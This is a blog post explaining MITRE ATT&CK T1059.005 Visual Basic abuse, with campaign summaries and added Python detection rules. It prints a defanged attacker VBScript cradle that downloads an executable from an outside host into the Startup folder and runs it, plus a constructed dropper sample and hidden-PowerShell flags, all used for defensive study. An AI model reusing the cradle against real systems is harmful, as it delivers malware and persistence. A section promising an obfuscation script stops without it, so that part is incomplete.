
T1059.005 Visual Basic in MITRE ATT&CK Explained

Written by Sıla Özeren Hacıoğlu | Mar 10, 2026 7:45:00 AM

What Is T1059.005 Visual Basic in MITRE ATT&CK?

T1059.005 Visual Basic is a sub-technique of Command and Scripting Interpreter (T1059) in the MITRE ATT&CK framework, under the Execution tactic. It refers to the use of Visual Basic–based languages by adversaries to execute code and automate actions on targeted systems.

Visual Basic (VB) is a programming language developed by Microsoft and derived from BASIC, designed to simplify application development and automation. Its ability to interact with system components through Component Object Model (COM) objects and native Windows APIs makes it suitable for executing code and manipulating system behavior.

This sub-technique also encompasses related scripting languages derived from Visual Basic, most notably Visual Basic for Applications (VBA) and VBScript. VBA is embedded within Microsoft Office applications such as Word, Excel, and PowerPoint and supports automation, access to Windows API functions, and interaction with dynamic link libraries (DLLs). VBScript, originally designed for web scripting, enables system and application interaction through COM and has historically been used in Internet Explorer and Internet Information Services (IIS).

To read about other sub-techniques of the T1059 Command and Scripting Interpreter technique, you can visit the related hub blog.

Adversary Use of T1059.005 Visual Basic

Adversaries use T1059.005 Visual Basic to execute malicious code and automate actions by abusing widely deployed and trusted scripting environments. Because VBA and VBScript are closely integrated with common enterprise software and operating system components, their execution can blend into normal user or administrative activity.

In malicious campaigns, adversaries frequently leverage VBA macros embedded in Microsoft Office documents to gain initial execution, often delivered via phishing attachments. VBScript is commonly used to launch payloads, interact with the file system, execute commands through COM objects, or chain execution with other scripting interpreters. By abusing these Visual Basic–based languages, attackers can support execution, persistence, and follow-on activity while minimizing the need for external tools.

Procedure Examples Used by Adversaries in Red Report 2026

Visual Basic is a capable and versatile tool, and adversaries exploit it to its fullest extent for malicious activity.

Downloading, Loading, and Executing Malicious Payloads

Visual Basic can be abused to download, load, and execute malicious payloads by embedding harmful code in VBScript or VBA macros.

For example, in June 2025 researchers described a campaign in which a malicious PPTX delivered a ZIP containing both a VBScript and an executable [1]: the VBScript fetched an executable from the web, the executable then loaded the final payloads (notably RAT families such as XRed and LodaRAT), and persistence was achieved via registry Run keys and a Startup-folder shortcut.

Below is a redacted VBScript snippet the attackers used to download the malware payload (intentionally non-executable and redacted for safe analysis).

Purchase Order Summary Details.vbs
<<<<<< Coded By Mr.Jamo>>>>>>
Set VQCPEVMM = CreateObject("WScript[.]Shell")
xhNetKOi = VQCPEVMM.SpecialFolders("Startup") & "\update[.]exe"
<<<<<< code start >>>>>>>
On Error Resume Next
wscript.sleep 3000
call jUgZrOCz("hxxps:///raw[.]githubusercontent[.]com/knkbkk212/knkbkk212/refs/..redacted../FGNEBI[.]exe",xhNetKOi)
sub jUgZrOCz(sitclink,filcname)
dim swNKDZVm
Set swNKDZVm = createobject("msxml2[.]xmlhttp")
dim MgnivARh
Set MgnivARh = createobject("ADodb[.]Stream")
swNKDZVm.Open "GET", sitelink, False
swNKDZVm.Send
with MgnivARh
.type = 1
.open
.Write swNKDZVm.responseBody
.savetofile filcname , 2
end with
end sub
VQCPEVMM.Exec (xhNetKOi)
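The redacted script above is a textbook VBScript download cradle: an HTTP client object fetches a binary, an ADODB.Stream writes it to the Startup folder, and WScript.Shell launches it. The following static triage helper is an added example (not Picus's or any vendor's code) that scores a script against that pattern; the rule set, weights, and both sample scripts are constructed for illustration, and the helper first undoes analyst defanging ("[.]", "hxxp") so a safe copy like the one above still matches.

```python
import re

# Weighted indicators for the VBScript download-and-execute pattern shown above.
# Constructed rule set for illustration only; not Picus's or any vendor's detection content.
INDICATORS = {
    "http_client":    (r'createobject\(\s*"(msxml2\.(server)?xmlhttp|winhttp\.winhttprequest)', 3),
    "binary_stream":  (r'createobject\(\s*"adodb\.stream"', 3),
    "write_to_disk":  (r'\.savetofile\b', 2),
    "exec_shell":     (r'\.(exec|run)\b', 3),
    "startup_folder": (r'specialfolders\(\s*"startup"\s*\)', 3),
    "error_suppress": (r'^\s*on error resume next', 1),
    "sleep_delay":    (r'wscript\.sleep', 1),
    "remote_url":     (r'https?://', 1),
}

def refang(text):
    """Undo analyst defanging ("[.]" and "hxxp") so a safe copy still matches the rules."""
    text = text.replace("[.]", ".")
    return re.sub(r"hxxp(s?)://", r"http\1://", text, flags=re.I)

def triage_vbscript(source):
    """Return matched indicators, a weighted score, and a verdict for one VBScript source."""
    src = refang(source)
    hits = {name: w for name, (pat, w) in INDICATORS.items() if re.search(pat, src, re.I | re.M)}
    cradle = {"http_client", "binary_stream", "write_to_disk", "exec_shell"}
    if cradle <= hits.keys():
        verdict = "download-and-execute cradle"   # fetch + write + launch all present
    elif sum(hits.values()) >= 5:
        verdict = "suspicious"
    else:
        verdict = "low"
    return {"score": sum(hits.values()), "hits": sorted(hits), "verdict": verdict,
            "persistence": "startup_folder" in hits}

# Constructed sample mirroring the structure of the redacted script above (placeholder URL).
DROPPER = '''Set sh = CreateObject("WScript[.]Shell")
target = sh.SpecialFolders("Startup") & "\\update[.]exe"
On Error Resume Next
wscript.sleep 3000
call fetch("hxxps://example[.]invalid/payload[.]exe", target)
sub fetch(url, path)
  Set http = CreateObject("msxml2[.]xmlhttp")
  Set stm = CreateObject("ADodb[.]Stream")
  http.Open "GET", url, False
  http.Send
  stm.type = 1 : stm.open : stm.Write http.responseBody : stm.savetofile path, 2
end sub
sh.Exec (target)'''

# Constructed benign admin script: touches the file system but never fetches or launches anything.
BENIGN = '''Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile("C:\\Temp\\inventory.txt", True)
f.WriteLine "host=" & CreateObject("WScript.Network").ComputerName : f.Close'''
```

Matching on object names rather than variable names is deliberate: the attacker's randomized identifiers (VQCPEVMM, jUgZrOCz) change per sample, but the COM ProgIDs and the SaveToFile/Exec calls do not.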

Procedure Examples Used by Adversaries in Red Report 2025

Void Banshee Campaign

In July 2024, security researchers reported on the Void Banshee campaign, which targeted Windows users through a vulnerability identified as CVE-2024-38112 [2]. The attack chain involved the use of a malicious HTML Application (HTA) file* containing a VBScript. This script decrypted XOR-encrypted content and executed it using PowerShell, facilitating the download and execution of additional malicious scripts from compromised web servers.

*SHA-256: 87480b151e465b73151220533c965f3a77046138f079ca3ceb961a7d5fee9a33

CoralRaider Campaign

In April 2024, another researcher uncovered the CoralRaider campaign, which targeted victims' data and social media accounts [3]. The attackers employed a malicious VBScript embedded within an HTA file. This VBScript executed an embedded PowerShell script in memory, which sequentially ran additional scripts to perform anti-virtual-machine and anti-analysis checks, bypass User Account Control (UAC), disable Windows and application notifications, and ultimately download and execute the RotBot malware.

Water Hydra Campaign

The final example is from February 2024, when researchers analyzed the Water Hydra campaign, which exploited a vulnerability (CVE-2024-21412) to bypass Microsoft Defender SmartScreen [4]. The final payload of this attack was a RAT known as DarkMe, written in Visual Basic. This malware communicated with its command-and-control server using a custom protocol over TCP, demonstrating the sophisticated use of Visual Basic in executing malicious operations.

These instances underscore the persistent threat posed by adversaries leveraging Visual Basic and its scripting variants to execute malicious code and maintain unauthorized access to targeted systems.

Procedure Examples Used by Adversaries in Red Report 2025

Downloading, Loading, and Executing Malicious Payloads

Sending a phishing email with an attachment containing a malicious macro is a prevalent initial access technique among adversaries.

For instance, between July and September 2023, the DarkGate malware [5] was propagated via phishing campaigns exploiting compromised Skype accounts. Attackers sent messages with attachments containing malicious VBA scripts.

These scripts were disguised to appear legitimate within the context of the existing conversation, enticing victims to open them. Once executed, the VBA scripts triggered the download of further malicious components, leading to the installation of the DarkGate payload on the victim's system. This use of script attachments in phishing highlights a sophisticated approach to bypassing users' vigilance and delivering malware.

In the case of IceBreaker malware, as documented in a February 2023 security report [6], the threat targets online gaming and gambling companies through an intricate blend of phishing and social engineering tactics. The cyber attackers impersonate customers experiencing account access difficulties and coax customer service representatives into downloading a file, ostensibly an image detailing the user's issue. This file, deceptively presented and often housed on a fraudulent website, is actually a container for a ZIP archive that deploys a malevolent VBA script or a manipulated LNK file. When activated, the VBA script is engineered to establish a network connection to a remote server from which it retrieves and launches the IceBreaker backdoor or Houdini RAT, both remote access trojans.
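The chains above share a recognizable process lineage: an Office application handing off to a script host (DarkGate, IceBreaker), or an HTA/VBScript host launching a hidden or encoded PowerShell stage (Void Banshee, CoralRaider). The detection logic below is an added example, not Picus's or any vendor's rules; field names follow Sysmon Event ID 1 conventions, and every event is constructed, including an obviously placeholder encoded command.

```python
# Process-lineage rules for the VBA/HTA/VBScript -> PowerShell chains described above.
# Constructed for illustration; the events are made up and the rules are not any vendor's content.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
FOLLOW_ON = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
PS_FLAGS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden", "bypass", "frombase64string")

def exe_name(path):
    """Basename of an image path, lower-cased, for comparison against the sets above."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the rule names that fire for one process-creation event (empty list if none)."""
    parent, child = exe_name(event["ParentImage"]), exe_name(event["Image"])
    cmd = event.get("CommandLine", "").lower()
    findings = []
    if parent in OFFICE and child in SCRIPT_HOSTS:
        findings.append("office_to_script_host")          # macro handing off to VBScript/HTA
    if parent in SCRIPT_HOSTS and child in FOLLOW_ON:
        findings.append("script_host_to_followon")         # HTA/VBScript launching PowerShell etc.
        if any(flag in cmd for flag in PS_FLAGS):
            findings.append("hidden_or_encoded_followon")  # the in-memory PowerShell stage
    if child == "mshta.exe" and any(k in cmd for k in ("http", "\\temp\\", "\\downloads\\")):
        findings.append("hta_from_web_or_user_writable")   # HTA run from a URL or a drop folder
    return findings

def scan(events):
    """Flatten rule hits across a batch as (ProcessId, rule) pairs."""
    return [(e["ProcessId"], rule) for e in events for rule in classify(e)]

# Constructed events: a macro-to-VBScript drop, an HTA launching hidden PowerShell, an HTA
# opened from Downloads, and two legitimate script-host uses that should stay quiet.
EVENTS = [
    {"ProcessId": 1001, "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": 'wscript.exe "C:\\Users\\u\\AppData\\Local\\Temp\\Purchase Order.vbs"'},
    {"ProcessId": 1002, "ParentImage": "C:\\Windows\\System32\\mshta.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc PLACEHOLDERBASE64=="},
    {"ProcessId": 1003, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": 'mshta.exe "C:\\Users\\u\\Downloads\\Books.hta"'},
    {"ProcessId": 1004, "ParentImage": "C:\\Windows\\System32\\services.exe",
     "Image": "C:\\Windows\\System32\\cscript.exe",
     "CommandLine": "cscript.exe C:\\Windows\\System32\\slmgr.vbs /dlv"},
    {"ProcessId": 1005, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile Get-Process"},
]
```

The two quiet events matter as much as the three hits: cscript.exe under services.exe running slmgr.vbs and an interactive PowerShell under explorer.exe are routine, so a rule keyed on the script host alone would drown the real chains in noise.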

Malicious Payload Obfuscation

Adversaries often use VB code because it can hide malicious scripts within seemingly harmless or irrelevant code, enabling them to bypass initial security scans. In a notable example from March 2023, disclosed in the TACTICAL#OCTOPUS operation, adversaries employed VB code to obfuscate malicious PowerShell scripts [7]. The obfuscated script and its obfuscation function are provided below.

References

[1] “[No title].” Available: https://threatresearch.ext.hp.com/wp-content/uploads/2025/06/HP_Wolf_Security_Threat_Insights_Report_June_2025.pdf. [Accessed: Nov. 06, 2025]

[2] “CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks,” Trend Micro, Jul. 15, 2024. Available: https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html. [Accessed: Nov. 27, 2024]

[3] C. Raghuprasad, “CoralRaider targets victims’ data and social media accounts,” Cisco Talos Blog, Apr. 04, 2024. Available: https://blog.talosintelligence.com/coralraider-targets-socialmedia-accounts/. [Accessed: Nov. 27, 2024]

[4] “CVE-2024-21412: Water Hydra Targets Traders with Microsoft Defender SmartScreen Zero-Day,” Trend Micro, Feb. 13, 2024. Available: https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html. [Accessed: Nov. 27, 2024]

[5] S. Gatlan, “DarkGate malware spreads through compromised Skype accounts,” BleepingComputer, Oct. 14, 2023. Available: https://www.bleepingcomputer.com/news/security/darkgate-malware-spreads-through-compromised-skype-accounts/. [Accessed: Dec. 20, 2023]

[6] Security Joes, “Operation Ice Breaker Targets The Gam(bl)ing Industry Right Before It’s Biggest Gathering,” Security Joes, Feb. 01, 2023. Available: https://www.securityjoes.com/post/operation-ice-breaker-targets-the-gam-bl-ing-industry-right-before-it-s-biggest-gathering. [Accessed: Dec. 20, 2023]

[7] “New TACTICAL#OCTOPUS Attack Campaign Targets US Entities with Malware Bundled in Tax-Themed Documents,” Securonix, Mar. 30, 2023. Available: https://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/. [Accessed: Jan. 12, 2024]